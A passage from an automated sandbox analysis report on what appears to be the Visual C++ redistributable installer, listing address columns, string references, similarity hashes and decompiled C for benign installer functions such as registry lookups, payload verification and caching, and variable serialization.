                                                                          0x00022ebb
                                                                          0x00022ebb
                                                                          0x00022ebb
                                                                          0x00000000
                                                                          0x00022ebb
                                                                          0x00000000
                                                                          0x00022f60
                                                                          0x00022e87
                                                                          0x00022e89
                                                                          0x00022e8c
                                                                          0x00022e8e
                                                                          0x00022eaf
                                                                          0x00022eb5
                                                                          0x000230f0
                                                                          0x00000000
                                                                          0x000230f0
                                                                          0x00000000
                                                                          0x00022eb5
                                                                          0x00022e97
                                                                          0x00022e98
                                                                          0x00022e9b
                                                                          0x00000000
                                                                          0x000230d0
                                                                          0x000230d6
                                                                          0x000230d7
                                                                          0x000230dc
                                                                          0x000230df
                                                                          0x000230e2
                                                                          0x000230e2
                                                                          0x000230e2
                                                                          0x00000000
                                                                          0x000230ee
                                                                          0x00022e18
                                                                          0x00022e3d
                                                                          0x00022e3f
                                                                          0x00022e42
                                                                          0x00022e44
                                                                          0x00022e4d
                                                                          0x00022e4d
                                                                          0x00000000
                                                                          0x00022e46
                                                                          0x00022e46
                                                                          0x00000000
                                                                          0x00022e46
                                                                          0x00022e1a
                                                                          0x00022e1a
                                                                          0x00022e1f
                                                                          0x00022e1f
                                                                          0x00022e20
                                                                          0x00000000
                                                                          0x00022e26

                                                                          Strings
                                                                          • UX aborted plan related bundle., xrefs: 00023127
                                                                          • %ls;%ls, xrefs: 00022EDE
                                                                          • crypt32.dll, xrefs: 00022E0E
                                                                          • Failed to lookup the bundle ID in the ancestors dictionary., xrefs: 000230F0
                                                                          • Failed to copy self to related bundle ancestors., xrefs: 0002312E
                                                                          • Failed to copy ancestors and self to related bundle ancestors., xrefs: 00022EF6
                                                                          • Unexpected relation type encountered during plan: %d, xrefs: 000230FE
                                                                          • plan.cpp, xrefs: 0002311D
                                                                          • Failed to create dictionary from ancestors array., xrefs: 00022E46
                                                                          • Failed to create string array from ancestors., xrefs: 00022E1A
                                                                          • Failed to add the package provider key "%ls" to the planned list., xrefs: 00023107
                                                                          • feclient.dll, xrefs: 000230BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %ls;%ls$Failed to add the package provider key "%ls" to the planned list.$Failed to copy ancestors and self to related bundle ancestors.$Failed to copy self to related bundle ancestors.$Failed to create dictionary from ancestors array.$Failed to create string array from ancestors.$Failed to lookup the bundle ID in the ancestors dictionary.$UX aborted plan related bundle.$Unexpected relation type encountered during plan: %d$crypt32.dll$feclient.dll$plan.cpp
                                                                          • API String ID: 0-794096528
                                                                          • Opcode ID: 49f5caa18576346ae139d9fbe4dba01aa5e8850df1d72bd43fb1c16e9b415687
                                                                          • Instruction ID: 132455a1a02a9faf5848f03f880640739f71164341e89b92ddb3233a98b523db
                                                                          • Opcode Fuzzy Hash: 49f5caa18576346ae139d9fbe4dba01aa5e8850df1d72bd43fb1c16e9b415687
                                                                          • Instruction Fuzzy Hash: EBB1D231900626FFCB65DFA4DC81EAEB7F6FF04310F104566E904AB251D735AAA0CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001A17D Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 50%
                                                                          			E0001A17D(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				int _v12;
				int _v16;
				int _v20;
				signed short _t51;
				intOrPtr _t55;
				signed short _t60;
				void* _t64;
				void* _t66;
				void* _t70;

				_t55 = _a4;
				_a4 =  *((intOrPtr*)(_t55 + 0x24));
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				if(E000171CF(_a8,  *((intOrPtr*)(_t55 + 0x1c)),  &_v8, 0) >= 0) {
					_t64 = 1;
					_t37 =  ==  ? 1 : 0x101;
					_t66 = E00050E3F( *((intOrPtr*)(_t55 + 0x18)), _v8,  ==  ? 1 : 0x101,  &_v16);
					if(_t66 < 0) {
						_push(_v8);
						if(_t66 != 0x80070002) {
							_push("Failed to open registry key. Key = \'%ls\'");
							_push(_t66);
							E0005012F();
							_t70 = _t70 + 0xc;
							L18:
							if(_t66 < 0) {
								_push(_t66);
								E0005061A(2, "RegistrySearchExists failed: ID \'%ls\', HRESULT 0x%x", _v8);
							}
							L20:
							E00012793(_v8);
							E00012793(_v12);
							if(_v16 != 0) {
								RegCloseKey(_v16);
							}
							return _t66;
						}
						_push("Registry key not found. Key = \'%ls\'");
						_push(2);
						E0005061A();
						_t70 = _t70 + 0xc;
						L14:
						_t64 = 0;
						L15:
						_t66 = E00018152(_a8,  *((intOrPtr*)(_t55 + 4)), _t64, 0, 0);
						if(_t66 >= 0) {
							goto L20;
						}
						_push("Failed to set variable.");
						L2:
						_push(_t66);
						E0005012F();
						goto L18;
					}
					if( *((intOrPtr*)(_t55 + 0x20)) == 0) {
						goto L15;
					}
					_t66 = E000171CF(_a8,  *((intOrPtr*)(_t55 + 0x20)),  &_v12, 0);
					if(_t66 >= 0) {
						_t51 = RegQueryValueExW(_v16, _v12, 0,  &_v20, 0, 0);
						_t60 = _t51;
						if(_t60 == 0) {
							goto L15;
						}
						if(_t60 == 0) {
							_push(_v12);
							E0005061A(2, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v8);
							_t70 = _t70 + 0x10;
							goto L14;
						}
						if(_t51 == 0) {
							goto L15;
						}
						_t69 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
						_t66 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "search.cpp", 0x322, _t66);
						_push("Failed to query registry key value.");
						goto L2;
					}
					_push("Failed to format value string.");
					goto L2;
				}
				_push("Failed to format key string.");
				goto L2;
			}













                                                                          0x0001a184
                                                                          0x0001a18f
                                                                          0x0001a199
                                                                          0x0001a19f
                                                                          0x0001a1a2
                                                                          0x0001a1a5
                                                                          0x0001a1b1
                                                                          0x0001a1cb
                                                                          0x0001a1d5
                                                                          0x0001a1e4
                                                                          0x0001a1e8
                                                                          0x0001a286
                                                                          0x0001a28f
                                                                          0x0001a2c2
                                                                          0x0001a2c7
                                                                          0x0001a2c8
                                                                          0x0001a2cd
                                                                          0x0001a2d0
                                                                          0x0001a2d2
                                                                          0x0001a2d4
                                                                          0x0001a2df
                                                                          0x0001a2e4
                                                                          0x0001a2e7
                                                                          0x0001a2ea
                                                                          0x0001a2f2
                                                                          0x0001a2fb
                                                                          0x0001a300
                                                                          0x0001a300
                                                                          0x0001a30e
                                                                          0x0001a30e
                                                                          0x0001a291
                                                                          0x0001a296
                                                                          0x0001a298
                                                                          0x0001a29d
                                                                          0x0001a2a0
                                                                          0x0001a2a0
                                                                          0x0001a2a2
                                                                          0x0001a2b2
                                                                          0x0001a2b6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001a2b8
                                                                          0x0001a1b8
                                                                          0x0001a1b8
                                                                          0x0001a1b9
                                                                          0x00000000
                                                                          0x0001a1bf
                                                                          0x0001a1f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001a209
                                                                          0x0001a20d
                                                                          0x0001a226
                                                                          0x0001a22e
                                                                          0x0001a231
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001a237
                                                                          0x0001a26f
                                                                          0x0001a27c
                                                                          0x0001a281
                                                                          0x00000000
                                                                          0x0001a281
                                                                          0x0001a23b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001a248
                                                                          0x0001a252
                                                                          0x0001a260
                                                                          0x0001a265
                                                                          0x00000000
                                                                          0x0001a265
                                                                          0x0001a20f
                                                                          0x00000000
                                                                          0x0001a20f
                                                                          0x0001a1b3
                                                                          0x00000000

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001A1A8
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001A204
                                                                          • RegQueryValueExW.ADVAPI32(000002C0,00000000,00000000,000002C0,00000000,00000000,000002C0,?,00000000,00000000,?,00000000,00000101,000002C0,000002C0,?), ref: 0001A226
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,000002C0,00000100,00000000,000002C0), ref: 0001A300
                                                                          Strings
                                                                          • Failed to format value string., xrefs: 0001A20F
                                                                          • Failed to set variable., xrefs: 0001A2B8
                                                                          • Failed to open registry key. Key = '%ls', xrefs: 0001A2C2
                                                                          • Failed to query registry key value., xrefs: 0001A265
                                                                          • Registry key not found. Key = '%ls', xrefs: 0001A291
                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0001A275
                                                                          • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0001A2D8
                                                                          • Failed to format key string., xrefs: 0001A1B3
                                                                          • search.cpp, xrefs: 0001A25B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16$CloseQueryValue
                                                                          • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                          • API String ID: 2702208347-46557908
                                                                          • Opcode ID: b822c93b8990da08483b6b02497eef0d7d5981e6bd4c53beb6073587ba18269a
                                                                          • Instruction ID: 50330439d1e05f209d15fc46f316413af290b5c4a578e7fbb96ad5b0642a1dea
                                                                          • Opcode Fuzzy Hash: b822c93b8990da08483b6b02497eef0d7d5981e6bd4c53beb6073587ba18269a
                                                                          • Instruction Fuzzy Hash: 1241E832E41214BBDF256F98CC06FEF7B69EF05711F104165FD08AA292D7728E90D692
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000295AC Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 122fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 16%
                                                                          			E000295AC(void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t15;
				intOrPtr _t26;
				signed short _t27;
				intOrPtr _t32;
				void* _t34;
				void* _t36;
				WCHAR* _t37;
				intOrPtr _t39;
				intOrPtr _t40;

				_t36 = __edx;
				_t37 = _a12;
				_t34 = CreateFileW(_t37, 0x80000000, 5, 0, 3, 0x8000000, 0);
				_a12 = _t34;
				if(_t34 != 0xffffffff) {
					_t15 = _a4;
					__eflags =  *((intOrPtr*)(_t15 + 0x20));
					if( *((intOrPtr*)(_t15 + 0x20)) == 0) {
						__eflags =  *((intOrPtr*)(_t15 + 0x1c));
						if( *((intOrPtr*)(_t15 + 0x1c)) == 0) {
							__eflags =  *((intOrPtr*)(_t15 + 0x30));
							if(__eflags == 0) {
								goto L12;
							} else {
								_t40 = E00028F8E(_t36, __eflags,  *((intOrPtr*)(_t15 + 0x30)),  *((intOrPtr*)(_t15 + 0x34)), _t37, _t34);
								__eflags = _t40;
								if(_t40 >= 0) {
									goto L12;
								} else {
									_push(_a8);
									_push("Failed to verify payload hash: %ls");
									goto L6;
								}
							}
						} else {
							_t26 = E000291F7(_t36, _t15, _t37, _t34);
							goto L4;
						}
					} else {
						_t26 = E0002A998(_t36, _t15, _t37, _t34);
						L4:
						_t40 = _t26;
						__eflags = _t40;
						if(_t40 >= 0) {
							L12:
							_t39 = _a16;
							_t32 = _a8;
							__eflags = _t39;
							_push(_t32);
							_push(_t37);
							_t17 =  ==  ? L"Copying" : L"Moving";
							E0005061A(2, "%ls payload from working path \'%ls\' to path \'%ls\'",  ==  ? L"Copying" : L"Moving");
							_push(0x7d0);
							_push(3);
							_push(1);
							__eflags = _t39;
							if(_t39 == 0) {
								_push(_t32);
								_push(_t37);
								_t40 = E00053FE7();
								__eflags = _t40;
								if(_t40 < 0) {
									_push(_t32);
									_push(_t37);
									_push("Failed to copy %ls to %ls");
									goto L17;
								}
							} else {
								_push(1);
								_push(_t32);
								_push(_t37);
								_t40 = E000541D1();
								__eflags = _t40;
								if(_t40 < 0) {
									_push(_t32);
									_push(_t37);
									_push("Failed to move %ls to %ls");
									L17:
									_push(_t40);
									E0005012F();
								}
							}
						} else {
							_push(_a8);
							_push("Failed to verify payload signature: %ls");
							L6:
							_push(_t40);
							E0005012F();
						}
					}
					CloseHandle(_a12);
				} else {
					_t27 = GetLastError();
					_t43 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
					_t40 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "cache.cpp", 0x56b, _t40);
					E0005012F(_t40, "Failed to open payload in working path: %ls", _t37);
				}
				return _t40;
			}












                                                                          0x000295ac
                                                                          0x000295b1
                                                                          0x000295cd
                                                                          0x000295cf
                                                                          0x000295d5
                                                                          0x00029619
                                                                          0x0002961c
                                                                          0x0002961f
                                                                          0x00029645
                                                                          0x00029648
                                                                          0x00029654
                                                                          0x00029657
                                                                          0x00000000
                                                                          0x00029659
                                                                          0x00029666
                                                                          0x00029668
                                                                          0x0002966a
                                                                          0x00000000
                                                                          0x0002966c
                                                                          0x0002966c
                                                                          0x0002966f
                                                                          0x00000000
                                                                          0x0002966f
                                                                          0x0002966a
                                                                          0x0002964a
                                                                          0x0002964d
                                                                          0x00000000
                                                                          0x0002964d
                                                                          0x00029621
                                                                          0x00029624
                                                                          0x00029629
                                                                          0x00029629
                                                                          0x0002962b
                                                                          0x0002962d
                                                                          0x00029676
                                                                          0x00029676
                                                                          0x0002967f
                                                                          0x00029682
                                                                          0x00029684
                                                                          0x00029685
                                                                          0x0002968b
                                                                          0x00029696
                                                                          0x0002969e
                                                                          0x000296a3
                                                                          0x000296a5
                                                                          0x000296a7
                                                                          0x000296a9
                                                                          0x000296c3
                                                                          0x000296c4
                                                                          0x000296ca
                                                                          0x000296cc
                                                                          0x000296ce
                                                                          0x000296d0
                                                                          0x000296d1
                                                                          0x000296d2
                                                                          0x00000000
                                                                          0x000296d2
                                                                          0x000296ab
                                                                          0x000296ab
                                                                          0x000296ad
                                                                          0x000296ae
                                                                          0x000296b4
                                                                          0x000296b6
                                                                          0x000296b8
                                                                          0x000296ba
                                                                          0x000296bb
                                                                          0x000296bc
                                                                          0x000296d7
                                                                          0x000296d7
                                                                          0x000296d8
                                                                          0x000296dd
                                                                          0x000296b8
                                                                          0x0002962f
                                                                          0x0002962f
                                                                          0x00029632
                                                                          0x00029637
                                                                          0x00029637
                                                                          0x00029638
                                                                          0x0002963d
                                                                          0x0002962d
                                                                          0x000296e4
                                                                          0x000295d7
                                                                          0x000295d7
                                                                          0x000295e8
                                                                          0x000295f2
                                                                          0x00029600
                                                                          0x0002960c
                                                                          0x00029611
                                                                          0x000296ef

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,0002A63D,?,00000000,?,?,0003B049), ref: 000295C7
                                                                          • GetLastError.KERNEL32(?,0002A63D,?,00000000,?,?,0003B049,?,00000000,?,00000000,?,?,0003B049,?), ref: 000295D7
                                                                          • CloseHandle.KERNEL32(?,0003B049,00000001,00000003,000007D0,?,?,0003B049,?), ref: 000296E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: %ls payload from working path '%ls' to path '%ls'$@Met$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                          • API String ID: 2528220319-789942400
                                                                          • Opcode ID: 89669a3105e4a331a0d91a2f97813fb533e756b7e411beccb2d3a13d525a9e22
                                                                          • Instruction ID: 5e8ee20b28c74bc41188ff303d0c376bf5d07d21380455b3f90a612bb3f579f5
                                                                          • Opcode Fuzzy Hash: 89669a3105e4a331a0d91a2f97813fb533e756b7e411beccb2d3a13d525a9e22
                                                                          • Instruction Fuzzy Hash: 6D31D471A407357BEB311A26AC0AFAF3A9DDF42F55F010219FD09BF292D6619D0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00017E7C Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 214COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00017E7C(void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				struct _CRITICAL_SECTION* _t58;
				char* _t59;
				char* _t60;
				intOrPtr _t68;
				void* _t70;
				char* _t75;
				void* _t76;
				char* _t87;
				void* _t93;
				signed int _t96;
				void* _t97;
				void* _t101;
				void* _t102;
				void* _t105;
				intOrPtr _t106;
				intOrPtr* _t110;
				void* _t113;

				_v8 = _v8 & 0x00000000;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x14], xmm0");
				asm("movlpd [ebp-0x1c], xmm0");
				EnterCriticalSection(_a4);
				_t113 = E0004F7B2(_a12, _a16,  *((intOrPtr*)(_a4 + 0x1c)));
				if(_t113 >= 0) {
					_t58 = _a4;
					_v12 = _v12 & 0x00000000;
					if( *((intOrPtr*)(_t58 + 0x1c)) <= 0) {
						L45:
						LeaveCriticalSection(_t58);
						_t105 = 8;
						_t97 = _t105;
						_t59 =  &_v24;
						do {
							 *_t59 = 0;
							_t59 = _t59 + 1;
							_t97 = _t97 - 1;
						} while (_t97 != 0);
						_t60 =  &_v32;
						do {
							 *_t60 = 0;
							_t60 = _t60 + 1;
							_t105 = _t105 - 1;
						} while (_t105 != 0);
						E00012793(_v8);
						return _t113;
					}
					_t106 = 0;
					_v16 = 0;
					do {
						_t110 =  *((intOrPtr*)(_a4 + 0x20)) + _t106;
						if(_a8 != 0) {
							if( *((intOrPtr*)(_t110 + 0x28)) == 0) {
								L6:
								_t93 = 0;
								L7:
								_t113 = E0004F7B2(_a12, _a16, _t93);
								if(_t113 < 0) {
									_push("Failed to write included flag.");
									L43:
									_push(_t113);
									E0005012F();
									_t58 = _a4;
									L44:
									goto L45;
								}
								if(_t93 == 0) {
									goto L31;
								}
								_t95 = _a16;
								_t113 = E0004F7E0(_t96, _a12, _a16,  *_t110);
								if(_t113 < 0) {
									_push("Failed to write variable name.");
									goto L43;
								}
								_t113 = E0004F7B2(_a12, _t95,  *((intOrPtr*)(_t110 + 0x18)));
								if(_t113 < 0) {
									_push("Failed to write variable value type.");
									goto L43;
								}
								_t68 =  *((intOrPtr*)(_t110 + 0x18));
								if(_t68 == 0) {
									L30:
									_t113 = E0004F7B2(_a12, _t95,  *((intOrPtr*)(_t110 + 0x24)));
									if(_t113 < 0) {
										_push("Failed to write literal flag.");
										goto L43;
									}
									goto L31;
								}
								_t70 = _t68 - 1;
								if(_t70 == 0) {
									_t113 = E0003006A(_t96, _t110 + 8,  &_v24);
									if(_t113 < 0) {
										_push("Failed to get numeric.");
										goto L43;
									}
									_t113 = E0004F77D(_a12, _t95, _v24, _v20);
									if(_t113 < 0) {
										L33:
										_push("Failed to write variable value as number.");
										goto L43;
									}
									_t101 = 8;
									_t75 =  &_v24;
									do {
										 *_t75 = 0;
										_t75 = _t75 + 1;
										_t101 = _t101 - 1;
									} while (_t101 != 0);
									goto L30;
								}
								_t76 = _t70 - 1;
								if(_t76 == 0) {
									_t113 = E000300E0(_t110 + 8,  &_v8);
									if(_t113 < 0) {
										_push("Failed to get string.");
										goto L43;
									}
									_t113 = E0004F7E0(_t96, _a12, _t95, _v8);
									if(_t113 < 0) {
										_push("Failed to write variable value as string.");
										goto L43;
									}
									if(_v8 != 0) {
										E00012793(_v8);
										_v8 = _v8 & 0x00000000;
									}
									goto L30;
								}
								if(_t76 != 1) {
									_t113 = 0x80070057;
									_push("Unsupported variable type.");
									goto L43;
								}
								_t113 = E000301D0(_t96, _t106, _t110 + 8,  &_v32);
								if(_t113 < 0) {
									_push("Failed to get version.");
									goto L43;
								}
								_t113 = E0004F77D(_a12, _t95, _v32, _v28);
								if(_t113 < 0) {
									goto L33;
								}
								_t102 = 8;
								_t87 =  &_v32;
								do {
									 *_t87 = 0;
									_t87 = _t87 + 1;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								goto L30;
							}
							L21:
							_t93 = 1;
							goto L7;
						}
						if( *((intOrPtr*)(_t110 + 0x2c)) != 2) {
							goto L21;
						}
						goto L6;
						L31:
						_t58 = _a4;
						_t96 = _v12 + 1;
						_t106 = _v16 + 0x38;
						_v12 = _t96;
						_v16 = _t106;
					} while (_t96 <  *((intOrPtr*)(_t58 + 0x1c)));
					goto L44;
				}
				_push("Failed to write variable count.");
				_push(_t113);
				E0005012F();
				_t58 = _a4;
				goto L45;
			}



























                                                                          0x00017e82
                                                                          0x00017e86
                                                                          0x00017e8f
                                                                          0x00017e94
                                                                          0x00017e99
                                                                          0x00017eae
                                                                          0x00017eb2
                                                                          0x00017ec9
                                                                          0x00017ecc
                                                                          0x00017ed4
                                                                          0x000180c0
                                                                          0x000180c1
                                                                          0x000180c9
                                                                          0x000180ca
                                                                          0x000180cc
                                                                          0x000180cf
                                                                          0x000180cf
                                                                          0x000180d2
                                                                          0x000180d3
                                                                          0x000180d3
                                                                          0x000180d8
                                                                          0x000180db
                                                                          0x000180db
                                                                          0x000180de
                                                                          0x000180df
                                                                          0x000180df
                                                                          0x000180e7
                                                                          0x000180f3
                                                                          0x000180f3
                                                                          0x00017eda
                                                                          0x00017edc
                                                                          0x00017ee0
                                                                          0x00017ee6
                                                                          0x00017eec
                                                                          0x00017fb5
                                                                          0x00017efc
                                                                          0x00017efc
                                                                          0x00017efe
                                                                          0x00017f0a
                                                                          0x00017f0e
                                                                          0x000180af
                                                                          0x000180b4
                                                                          0x000180b4
                                                                          0x000180b5
                                                                          0x000180ba
                                                                          0x000180bf
                                                                          0x00000000
                                                                          0x000180bf
                                                                          0x00017f16
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00017f1e
                                                                          0x00017f2a
                                                                          0x00017f2e
                                                                          0x000180a8
                                                                          0x00000000
                                                                          0x000180a8
                                                                          0x00017f40
                                                                          0x00017f44
                                                                          0x000180a1
                                                                          0x00000000
                                                                          0x000180a1
                                                                          0x00017f4d
                                                                          0x00017f50
                                                                          0x0001803b
                                                                          0x00018047
                                                                          0x0001804b
                                                                          0x0001809a
                                                                          0x00000000
                                                                          0x0001809a
                                                                          0x00000000
                                                                          0x0001804b
                                                                          0x00017f56
                                                                          0x00017f59
                                                                          0x00018011
                                                                          0x00018015
                                                                          0x00018093
                                                                          0x00000000
                                                                          0x00018093
                                                                          0x00018026
                                                                          0x0001802a
                                                                          0x0001806b
                                                                          0x0001806b
                                                                          0x00000000
                                                                          0x0001806b
                                                                          0x0001802e
                                                                          0x0001802f
                                                                          0x00018032
                                                                          0x00018032
                                                                          0x00018035
                                                                          0x00018036
                                                                          0x00018036
                                                                          0x00000000
                                                                          0x00018032
                                                                          0x00017f5f
                                                                          0x00017f62
                                                                          0x00017fd0
                                                                          0x00017fd4
                                                                          0x0001808c
                                                                          0x00000000
                                                                          0x0001808c
                                                                          0x00017fe6
                                                                          0x00017fea
                                                                          0x00018085
                                                                          0x00000000
                                                                          0x00018085
                                                                          0x00017ff4
                                                                          0x00017ff9
                                                                          0x00017ffe
                                                                          0x00017ffe
                                                                          0x00000000
                                                                          0x00017ff4
                                                                          0x00017f67
                                                                          0x00018079
                                                                          0x0001807e
                                                                          0x00000000
                                                                          0x0001807e
                                                                          0x00017f7a
                                                                          0x00017f7e
                                                                          0x00018072
                                                                          0x00000000
                                                                          0x00018072
                                                                          0x00017f93
                                                                          0x00017f97
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00017f9f
                                                                          0x00017fa0
                                                                          0x00017fa3
                                                                          0x00017fa3
                                                                          0x00017fa6
                                                                          0x00017fa7
                                                                          0x00017fa7
                                                                          0x00000000
                                                                          0x00017fac
                                                                          0x00017fbb
                                                                          0x00017fbd
                                                                          0x00000000
                                                                          0x00017fbd
                                                                          0x00017ef6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001804d
                                                                          0x00018050
                                                                          0x00018053
                                                                          0x00018057
                                                                          0x0001805a
                                                                          0x0001805d
                                                                          0x00018060
                                                                          0x00000000
                                                                          0x00018069
                                                                          0x00017eb4
                                                                          0x00017eb9
                                                                          0x00017eba
                                                                          0x00017ebf
                                                                          0x00000000

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000), ref: 00017E99
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?), ref: 000180C1
                                                                          Strings
                                                                          • Failed to write variable count., xrefs: 00017EB4
                                                                          • Failed to get numeric., xrefs: 00018093
                                                                          • Failed to write variable value as number., xrefs: 0001806B
                                                                          • Failed to get string., xrefs: 0001808C
                                                                          • Failed to write variable value type., xrefs: 000180A1
                                                                          • Failed to write variable value as string., xrefs: 00018085
                                                                          • Failed to write literal flag., xrefs: 0001809A
                                                                          • Failed to write variable name., xrefs: 000180A8
                                                                          • Failed to write included flag., xrefs: 000180AF
                                                                          • Failed to get version., xrefs: 00018072
                                                                          • Unsupported variable type., xrefs: 0001807E
                                                                          • feclient.dll, xrefs: 00017F74, 00017FCA, 0001800B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                          • API String ID: 3168844106-2118673349
                                                                          • Opcode ID: 135febdb1129470567d69e3897331c0362fa2a1ed36b05b9bc17bdb7b93d65ae
                                                                          • Instruction ID: b84071857df201557aa70143e4a8310475cdb11a47fa2fd206837311801f8b5d
                                                                          • Opcode Fuzzy Hash: 135febdb1129470567d69e3897331c0362fa2a1ed36b05b9bc17bdb7b93d65ae
                                                                          • Instruction Fuzzy Hash: 5D61B23680461EAFCBA39E64C840BEF7BA5FF08355F118162FE0067191CB31DE989B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002EDFE Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E0002EDFE(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				long _t23;
				signed short _t43;
				long _t53;
				intOrPtr* _t63;
				intOrPtr _t66;
				void* _t67;

				_push(__ecx);
				_v8 = 0;
				_t23 = E000138D4(0x14, 1);
				_t66 = _a4;
				_t53 = _t23;
				EnterCriticalSection( *(_t66 + 0xc));
				_t57 =  *(_t66 + 0xc) + 0xb8;
